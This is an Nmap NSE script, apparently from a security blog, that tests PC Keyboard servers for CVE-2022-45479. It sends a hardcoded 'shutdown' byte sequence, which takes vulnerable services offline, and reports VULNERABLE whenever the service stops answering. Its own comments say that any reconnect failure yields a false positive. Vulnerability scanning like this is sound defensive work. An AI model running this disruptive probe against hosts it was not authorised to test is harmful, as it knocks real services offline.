---
-- https://shellcode.blog/services
---
--Usage:
--nmap -script PCKeyboard_check_script.nse -sT -p 7007 <host>
--Output Example:
-- PORT STATE SERVICE REASON
-- 7007/tcp open PCKeyboard syn-ack
-- | PCKeyboard_check_script:
-- | VULNERABLE:
-- | PCKeyboard Remote Code Execution
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2022-45479
-- | Risk factor: High CVSSv3: 9.8 (HIGH) (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
-- | PC Keyboard allows remote unauthenticated users to send instructions to the server to execute arbitrary code.
-- |
-- | Disclosure date: 2022-11-30
-- | References:
-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45479
-- Load required Nmap modules
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
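-- NSE script metadata. `description` is the help text Nmap shows for the
-- script; `categories` controls which category selections include it.
description = [[
PCKeyboard CVE-2022-45479 is a Remote Code Execution vulnerability.
This script checks for the existence of CVE-2022-45479 based on the server's availability after sending a "shutdown" signal.
The check is disruptive: on a vulnerable target the service stops answering on the scanned port.
]]
author = "Mohammed Alshehri"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
-- "dos" is listed because the probe is a shutdown signal and the verdict is
-- "the service went away": a vulnerable service is taken offline by the check,
-- so selections such as `--script "not dos"` must be able to exclude it.
categories = {"intrusive", "auth", "vuln", "dos"}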
--- Record the fingerprinted service on the port and publish it to Nmap.
-- Marks the port table as "open", fills in its version name and product,
-- then hands the result to nmap.set_port_version followed by
-- nmap.set_port_state.
-- NOTE(review): product is set to the literal "30"; what that value stands
-- for is not visible in this file - confirm it is intended.
-- @param host Host table handed to the script by NSE.
-- @param port Port table handed to the script by NSE; modified in place.
function set_nmap(host, port)
  local open_state = "open"

  port.state = open_state

  local version = port.version
  version.name = "PCKeyboard"
  version.product = "30"

  nmap.set_port_version(host, port)
  nmap.set_port_state(host, port, open_state)
end
-- Port rule: run against TCP port 7007, or against a TCP port whose service
-- name is "PCKeyboard".
local pckeyboard_port = 7007
local pckeyboard_service = "PCKeyboard"
portrule = shortport.port_or_service(pckeyboard_port, pckeyboard_service, "tcp")
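--- Check the service for CVE-2022-45479 by testing whether it survives a
-- "shutdown" signal.
--
-- Steps: connect, send the signal, disconnect, wait 8 seconds, then try to
-- connect again. If the second connection attempt fails, the port is
-- reported as VULNERABLE.
--
-- The verdict is inferred from reachability alone: every failure of the
-- second connection attempt (packet loss, filtering, a timeout) is reported
-- as VULNERABLE, so a positive result should be confirmed on the host.
--
-- @param host Host table supplied by NSE.
-- @param port Port table supplied by NSE.
-- @return The formatted vulnerability report when the target is judged
--   vulnerable, the string "Error: 2" when the signal could not be sent,
--   and nil in every other case.
action = function(host, port)
  -- The "shutdown" signal used as the probe.
  local detection_code = string.char(0x23, 0x4a, 0x23, 0x4b, 0x32, 0x3a, 0x30, 0x31)

  -- Report entry for CVE-2022-45479; the state is flipped to VULN only when
  -- the service stops accepting connections after the probe.
  local vuln_45479 = {
    title = "PCKeyboard Remote Code Execution",
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    scores = {
      CVSSv3 = "9.8 (HIGH) (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)",
    },
    description = [[
PC Keyboard allows remote unauthenticated users to send instructions to the server to execute arbitrary code.
]],
    IDS = { CVE = "CVE-2022-45479" },
    references = {
      'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45479',
    },
    dates = { disclosure = { year = '2022', month = '11', day = '30' } },
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  local sock = nmap.new_socket("tcp")
  sock:set_timeout(1000)

  -- First connection: deliver the probe.
  local connected, connect_err = sock:connect(host, port, "tcp")
  if not connected then
    stdnse.debug1(
      'Error establishing a TCP connection for %s - %s', tostring(host.ip), tostring(connect_err)
    )
    sock:close()
    return nil
  end

  local sent, send_err = sock:send(detection_code)
  -- Release the socket on both outcomes; the failure path used to leak it.
  sock:close()
  if not sent then
    -- Log the send error itself; the connect error is nil at this point
    -- because the connection succeeded.
    stdnse.debug1(
      'Error sending a TCP message for %s - %s', tostring(host.ip), tostring(send_err)
    )
    return "Error: 2"
  end

  -- Give the service time to act on the signal before re-probing.
  stdnse.debug1("------------------------------------ Waiting ------------------------------------")
  stdnse.sleep(8)

  -- Second connection: is the service still there?
  -- NOTE(review): the socket object is reused after close(); whether the
  -- 1000 ms timeout set above still applies to this attempt is not visible
  -- in this file - confirm.
  local reconnected, reconnect_err = sock:connect(host, port, "tcp")
  sock:close()
  if not reconnected then
    stdnse.debug1(
      'Error establishing a TCP connection for %s - %s', tostring(host.ip), tostring(reconnect_err)
    )
    vuln_45479.state = vulns.STATE.VULN
    set_nmap(host, port)
    return vuln_report:make_output(vuln_45479)
  end

  stdnse.debug1("Good news! The server is still connectable : )")
  return nil
end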